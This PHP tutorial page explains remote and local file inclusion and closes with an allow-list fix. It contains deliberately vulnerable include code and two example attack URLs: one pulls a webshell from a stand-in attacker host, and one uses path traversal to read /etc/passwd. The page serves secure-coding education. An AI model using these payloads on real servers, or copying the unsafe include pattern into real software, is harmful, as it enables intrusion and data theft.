Essential Books

File Inclusion

suggest change

Remote File Inclusion

Remote File Inclusion (also known as RFI) is a type of vulnerability that allows an attacker to include a remote file.

This example injects a remotely hosted file containing a malicious code: 

<?php
include $_GET['page'];
/vulnerable.php?page=http://evil.example.com/webshell.txt?

Local File Inclusion

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. 

<?php
$page = 'pages/'.$_GET['page'];
if(isset($page)) {
    include $page;
} else {
    include 'index.php';
}
/vulnerable.php?page=../../../../etc/passwd

Solution to RFI & LFI:

It is recommended to only allow including files you approved, and limit to those only. 

<?php
$page = 'pages/'.$_GET['page'].'.php';
$allowed = ['pages/home.php','pages/error.php'];
if(in_array($page,$allowed)) {
    include($page);
} else {
    include('index.php');
}
Found a mistake? Have a question or improvement idea? Let me know.

Feedback about page:

Feedback:
Optional: your email if you want me to get back to you:

Security:
* Security
* PHP Version Leakage
* Cross-Site Scripting XSS
* Cross-Site Request Forgery
* Command Line Injection
* File Inclusion
* Stripping Tags
* Error Reporting
* Uploading files
Table Of Contents
0 Getting started
1 Variables
2 Arrays
3 Functional programming
4 Types
5 Autoloading primer
6 Exception handling and error reporting
7 Working with dates and time
8 Sending email
9 Sessions
10 Cookies
11 Classes and objects
12 Password hashing
13 Output buffering
14 JSON
15 SOAP
16 Reflection
17 cURL
18 Dependency injection
19 XML
20 Regular expressions
21 Traits
22 Namespaces
23 Parsing HTML
24 Composer dependency manager
25 Magic methods
26 Alternative syntax for control structures
27 File handling
28 Magic constants
29 Type hinting
30 Multi-threading extension
31 Filters, filter functions
32 Generators
33 Operators
34 Constants
35 UTF-8
36 URLs
37 Object serialization
38 PHPDoc
39 Contributing to PHP Manual
40 String parsing
41 Loops
42 Control structures
43 Serialization
44 Closur
45 Reading request data
46 Type juggling and non-strict comparison issues
47 Security
48 PHP MySQLi
49 Command Line Interface CLI
50 Localization
51 Debugging
52 Superglobal variables
53 Unit testing
54 Variable scope
55 References
56 Compilation errors and warning
57 Installing PHP on Windows
58 DateTime class
59 Headers manipulation
60 Performance
61 Common Errors
62 Installing on Linux / Unix
63 Contributing to PHP Core
64 Coding conventions
65 Using MongoDB
66 Asynchronous programming
67 Using SQLSRV
68 Unicode Support
69 Functions
70 Create PDF files
71 Hot to detect client IP address
72 YAML
73 Image processing with GD
74 Multiprocessing
75 SOAP Server
76 Machine learning
77 Cache
78 Streams
79 Array iteration
80 Cryptography
81 PDO
82 SQLite3
83 Sockets
84 Outputting the value of a variable
85 String formatting
86 Compile PHP extensions
87 MongoDB
88 Manipulating an array
89 Executing upon an array
90 Processing multiple arrays together
91 SPL data structures
92 Comments
93 IMAP
94 Redis
95 Imagick
96 SimplXML
97 HTTP Authentication
98 Recipies
99 BC Math Binary Calculator
100 Docker deployment
101 WebSockets
102 APCu
103 Design patterns
104 Secure remember me
105 PHP mysqli
106 PHP built-in server
107 How to break down an URL
108 PSR
109 Contributors